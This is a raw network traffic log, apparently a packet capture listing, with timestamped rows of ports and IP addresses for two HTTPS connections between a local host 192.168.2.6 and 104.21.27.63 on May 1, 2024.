May 1, 2024 15:17:07.942506075 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.942554951 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.943208933 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.943264008 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.960261106 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.991123915 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.991194010 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.991805077 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.991839886 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.991844893 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.991852045 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:07.991880894 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:07.996495962 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.008586884 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.008625031 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.008637905 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.008645058 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.008671999 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.032790899 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.032839060 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.032845974 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.032869101 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.032885075 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.032892942 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.032912016 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.033279896 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.033325911 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.033333063 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.033375025 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.033869028 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.033899069 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.033919096 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.033926010 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.033948898 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.033962011 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.034677982 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.034738064 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.034739017 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.034749031 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.034790039 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.035617113 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.035659075 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.035669088 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.035681009 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.035706043 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.035721064 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.036446095 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.036489010 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.037281990 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.037333012 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.037462950 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.037513971 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.037556887 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.037601948 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.038413048 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.038444996 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.038464069 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.038470030 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.038486958 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.038510084 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.039633989 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.039679050 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.040144920 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.040198088 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.040205956 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.040215015 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.040256977 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.041172028 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.041218996 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.041229963 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.041269064 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.041274071 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.041280985 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.041317940 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.042148113 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.042196989 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.043853998 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.043860912 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.043886900 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.043910980 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.043915987 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.043937922 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.043947935 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.045042038 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.045057058 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.045115948 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.045124054 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.045171976 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.047661066 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.047677994 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.047730923 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.047736883 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.047777891 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.049467087 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.049503088 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.049541950 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.049551010 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.049573898 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.049598932 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.085619926 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.085638046 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.085823059 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.085835934 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.085932016 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.087678909 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.087696075 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.087754011 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.087760925 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.087800980 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.103079081 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.103097916 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.103291035 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.103302956 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.103351116 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.104353905 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.104368925 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.104435921 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.104444027 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.104485989 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.127348900 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.127367020 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.127429962 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.127439022 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.127494097 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.129250050 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.129266977 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.129338980 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.129347086 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.129384995 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.131486893 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.131504059 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.131557941 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.131567001 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.131593943 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.131632090 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.133306026 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.133322001 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.133408070 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.133416891 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.133454084 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.135051966 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.135067940 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.135128021 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.135138988 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.135191917 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.136801004 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.136816978 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.136872053 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.136892080 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.136929035 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.138668060 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.138684034 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.138751030 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.138762951 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.138797998 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.140777111 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.140819073 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.140862942 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.140871048 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.140896082 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.140909910 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.142544031 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.142558098 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.142616034 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.142625093 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.142663002 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.144224882 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.144268036 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.144292116 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.144299030 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.144329071 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.144337893 CEST	443	49710	104.21.27.63	192.168.2.6
May 1, 2024 15:17:08.144347906 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.146718979 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.166352034 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.244946957 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:08.874082088 CEST	49710	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.046843052 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.046875000 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.046983957 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.047696114 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.047708988 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.247277975 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.251064062 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.251095057 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.613941908 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.613987923 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614017010 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614036083 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.614058018 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614089012 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614095926 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.614104033 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614145994 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.614337921 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614429951 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614460945 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614478111 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.614486933 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.614526987 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.614533901 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.659200907 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.664681911 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.664979935 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665005922 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665024042 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.665040016 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665087938 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.665236950 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665282011 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665314913 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665321112 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.665329933 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665365934 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.665779114 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665837049 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665868998 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665879011 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.665888071 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665920019 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665924072 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.665932894 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.665980101 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.666789055 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.666840076 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.666882992 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.666882992 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.666912079 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.666949034 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.666956902 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.667679071 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.667705059 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.667721033 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.667730093 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.667781115 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.723776102 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.723817110 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.723843098 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.723864079 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.723877907 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.723886967 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.723923922 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.723936081 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.723977089 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.723984003 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.724061966 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.724104881 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.724112988 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725023985 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725071907 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.725081921 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725131035 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.725362062 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725419998 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.725718975 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725748062 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725763083 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.725770950 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.725789070 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.761977911 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.762023926 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.762039900 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.762073040 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.763019085 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.763078928 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.763210058 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.763263941 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.764147997 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.764177084 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.764205933 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.764216900 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.764235973 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.764255047 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.766829014 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.775908947 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.775968075 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.776117086 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.776182890 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.784991026 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.803131104 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.803236961 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.819116116 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.819233894 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.819330931 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.819384098 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.819741011 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.819788933 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.819844961 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.819885969 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.819894075 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.819901943 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.819926977 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.819941998 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.820754051 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.820785999 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.820802927 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.820810080 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.820835114 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.820853949 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.821693897 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.821762085 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.821780920 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.821831942 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.822664022 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.822714090 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.822832108 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.822880983 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.823630095 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.823692083 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.823702097 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.823759079 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.824554920 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.824606895 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.824606895 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.824619055 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.824652910 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.825179100 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.825210094 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.825227022 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.825237036 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.825287104 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.825295925 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.826114893 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.826204062 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.826231003 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.826239109 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.826250076 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.826286077 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.827243090 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.827301979 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.827380896 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.827430010 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.827997923 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.828032017 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.828049898 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.828057051 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.828116894 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.828123093 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.841239929 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.841303110 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.845912933 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.857119083 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.857186079 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.857209921 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.857220888 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.857264996 CEST	49712	443	192.168.2.6	104.21.27.63
May 1, 2024 15:17:09.857295990 CEST	443	49712	104.21.27.63	192.168.2.6
May 1, 2024 15:17:09.857335091 CEST	49712	443	192.168.2.6	104.21.27.63
